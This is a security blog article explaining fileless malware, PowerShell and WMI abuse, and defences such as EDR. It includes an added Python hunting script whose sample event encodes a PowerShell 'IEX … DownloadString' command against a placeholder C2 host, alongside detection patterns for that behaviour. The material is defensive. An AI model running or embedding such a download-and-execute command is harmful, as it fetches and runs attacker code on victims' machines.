Malware spotlight: Fileless malware

December 30, 2019 by Fakhar Imam

Introduction

Fileless malware is a malicious technique that uses existing software, legitimate applications, operating system files and the authorized protocols of the victim’s machine to achieve the attacker’s goals. Fileless malware leaves no footprint because it is not a file-based attack that requires downloading executable files onto the infected system. Rather, this attack is memory-based, which is why detecting it is a daunting task.

According to Symantec’s 2019 Internet Security Threat Report, fileless malware is growing rapidly. It is now one of the most substantial digital infiltration threats to organizations.

In this article, we will go through what fileless malware is, its common types and how it works, as well as prevention techniques used to get rid of it.


What are the common types of fileless malware attacks?

Fileless malware attacks are divided into three primary categories:

  1. Script-based techniques: These may not be completely fileless, but they can still be difficult to detect. Examples of these attacks include Operation Cobalt Kitty and SamSam ransomware
  2. Memory code injection: This technique is used to hide malicious code in the memory of legitimate software programs. Some processes are critical for proper Windows functionality. Fileless malware spreads and re-injects itself into these processes in order to help hackers accomplish their malicious goals
  3. Windows registry manipulation: Using this technique, attackers use a link or malicious file that, when clicked on, relies on Windows processes to write fileless malware code into the Windows registry and execute it. Poweliks and Kovter are examples of this type of attack

What is the difference between fileless malware and traditional malware?

In the past, malware was simply an executable file written to perform malicious acts on a victim’s computer. There was an easy solution: antivirus vendors would create signatures for these files in order to detect static pieces of this malicious code on disk. In 2017, fileless malware emerged, and so began the new age of malware detection and prevention. We could no longer simply rely on signatures to block malware because the malicious payload no longer resided on the victim’s hard drive.

According to the State of Endpoint Security Risk Report published by Ponemon Institute, pieces of fileless malware are evasive threats that distinguish themselves from traditional malware by limiting their malicious activities solely to the memory of the victim’s computer and avoiding leaving any artifact on the file system.

How does fileless malware avoid detection?

Fileless malware attacks are considered evasive in nature for several reasons. First, as said above, they piggyback on legitimate software and operating system files, carrying out suspicious activities while the allowed applications continue to run. Second, fileless malware resides in memory, not on disk. Third, it leaves none of the traditional footprints from which a signature could be built to help antivirus products detect it. Fileless malware mostly leverages built-in Windows tools such as Windows Management Instrumentation (WMI) and PowerShell to avoid detection.

The whitelisting security approach, which only allows legitimate applications to install, is also useless against fileless attacks. This is because these attacks take advantage of trusted applications that are already on the approved list.

Why do hackers use PowerShell for fileless attacks?

One of the most important reasons hackers use PowerShell for fileless attacks is that it gives them quick access to operating system functions and is accepted as a trusted and legitimate tool. Other reasons include:

  • PowerShell is a built-in program on Windows
  • The scripts of PowerShell are easy to obfuscate and are difficult to detect with traditional security products

What techniques do hackers use to penetrate your network?

We have already shed light on some techniques hackers use to penetrate your networks, such as through PowerShell or WMI. However, there are several other ways fileless malware can be injected into your computer. They include:

  • Attackers often create fraudulent websites that seem legitimate but are actually malicious
  • Attackers inject malicious code through by-default, legitimate applications such as JavaScript or Microsoft Office tools
  • The malicious payload can also be injected through infected downloads, suspicious links and phishing emails that look trustworthy

Here is the potential chain that hackers may use to compromise your data.

  1. Cybercriminals send you a spam message that includes a link to a malicious website
  2. You click on the link
  3. The infected website loads a Flash player
  4. Flash player further opens the Windows PowerShell tool
  5. PowerShell will download and execute a script from a command-and-control (C&C) server
  6. The PowerShell script finds and sends your data to threat actors

How can I defend against fileless malware attacks?

Though defending against fileless malware attacks is a daunting task due to their evasive nature, several techniques have been developed. Below are some proactive security measures that can help to protect against fileless malware.

Endpoint Detection and Response (EDR)

We need to take a more active approach to our network security. This involves having a next-generation endpoint security solution, which will log all system activity. Threat hunters monitor all activities in information systems. Even if calc.exe has been compromised, they will be able to see that there is suspicious system activity happening under this executable. Custom rules can then be created to hunt for and stop any threats.

More importantly, the EDR should perform real-time monitoring of outgoing and incoming network traffic, phishing emails and unwanted tasks in operations like PowerShell and WMI.
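As an illustration of the kind of custom hunting rule described above (an added example, not code from the original article or from any EDR product), the following Python evaluates process-creation events for PowerShell started by an unexpected parent, decodes any `-EncodedCommand` argument and inspects the decoded script for download-and-execute behavior. The event fields, the list of unusual parents and the sample events are assumptions constructed for this example.

```python
import base64
import re

UNUSUAL_PARENTS = {"iexplore.exe", "chrome.exe", "winword.exe", "excel.exe", "calc.exe"}  # assumed; tune
SHELLS = {"powershell.exe", "pwsh.exe"}
FLAG = re.compile(r"\s-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)  # -e, -enc, ... -EncodedCommand
NETWORK = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest", re.I)
EXECUTE = re.compile(r"\biex\b|invoke-expression", re.I)
HIDDEN = re.compile(r"\s-w(?:in(?:dowstyle)?)?\s+hidden", re.I)

def decode_encoded_command(cmdline):
    for flag, blob in FLAG.findall(cmdline):
        # PowerShell accepts any unambiguous prefix of -EncodedCommand, plus the alias -ec.
        if "encodedcommand".startswith(flag.lower()) or flag.lower() == "ec":
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except ValueError:  # invalid base64, or bytes that are not UTF-16LE
                return ""
    return ""

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(event):
    """Return the reasons a process-creation event looks suspicious (empty list if none)."""
    if basename(event["image"]) not in SHELLS:
        return []
    reasons = ["unusual-parent"] if basename(event["parent"]) in UNUSUAL_PARENTS else []
    decoded = decode_encoded_command(event["cmdline"])
    if decoded:
        reasons.append("encoded-command")
    text = event["cmdline"] + " " + decoded  # inspect the decoded script, not only the flags
    if NETWORK.search(text) and EXECUTE.search(text):
        reasons.append("download-and-execute")
    if HIDDEN.search(text):
        reasons.append("hidden-window")
    return reasons

def hunt(events):
    return {e["pid"]: r for e in events if (r := evaluate(e))}

# Constructed sample events (not real telemetry); c2.example.invalid is a placeholder host.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"
B64 = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 202, "parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"pid": 303, "parent": r"C:\Program Files\Internet Explorer\iexplore.exe", "image": PS, "cmdline": "powershell.exe -NoP -W Hidden -Enc " + B64},
    {"pid": 404, "parent": r"C:\Windows\System32\calc.exe", "image": PS, "cmdline": "powershell.exe -ExecutionPolicy Bypass -Command Get-Date"},
]
```

Calling `hunt(SAMPLE_EVENTS)` returns only the browser-spawned and calc.exe-spawned PowerShell events; the administrator's scheduled script launched from explorer.exe is not flagged.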

Anti-malware solutions

Many anti-malware solutions also attempt to help in this effort. They do this by taking a dynamic detection approach based on system activity rather than relying on static detections alone.

Patches and updates 

Always keep your software applications and operating systems up to date with security patches and latest updates. Unpatched and outdated applications can provide backdoors to hostile actors.

Memory analysis

Since fileless malware resides in memory, your security solutions should also be capable of performing memory analysis and protection.

Behavior monitoring

Fileless malware often relies on human vulnerability, which means system and user behavior analysis and detection will be key security measures. Using User Behavior Analytics (UBA), you can find hidden threats and increase the accuracy of your security operations while shortening investigation timelines. Today, behavior monitoring features are offered by many security solutions such as McAfee Enterprise Security Manager.

Integration

Since fileless malware is evasive and sophisticated, you need to deploy multilayered security. This means your security solution must allow the integration of other security tools in order to strengthen your cybersecurity defense against the fileless malware.

Employee training

Train your employees on how to identify suspicious activity, whether it is suspicious emails or web links. Creating internal “phishing tests” is an ongoing need, and you’ll be surprised at how many of your employees will fail these tests.

Conclusion

This article has taken a look at fileless malware, its types, operations and prevention techniques. You can see that fileless malware attacks are evasive and very sophisticated in nature, as they don’t need to be installed on the hard drive like other common malware. Instead, fileless malware stores itself in memory and uses legitimate applications and operating system processes to perpetrate malicious activities.

Various techniques are available to defend against this attack, including a next-generation EDR solution, an anti-malware program, behavior analysis techniques, anti-phishing best practices, memory analysis, and patches and upgrades.

 


Fakhar Imam is a professional writer with a master’s program in Masters of Sciences in Information Technology (MIT). To date, he has produced articles on a variety of topics, including Computer Forensics, CISSP and various other IT-related tasks.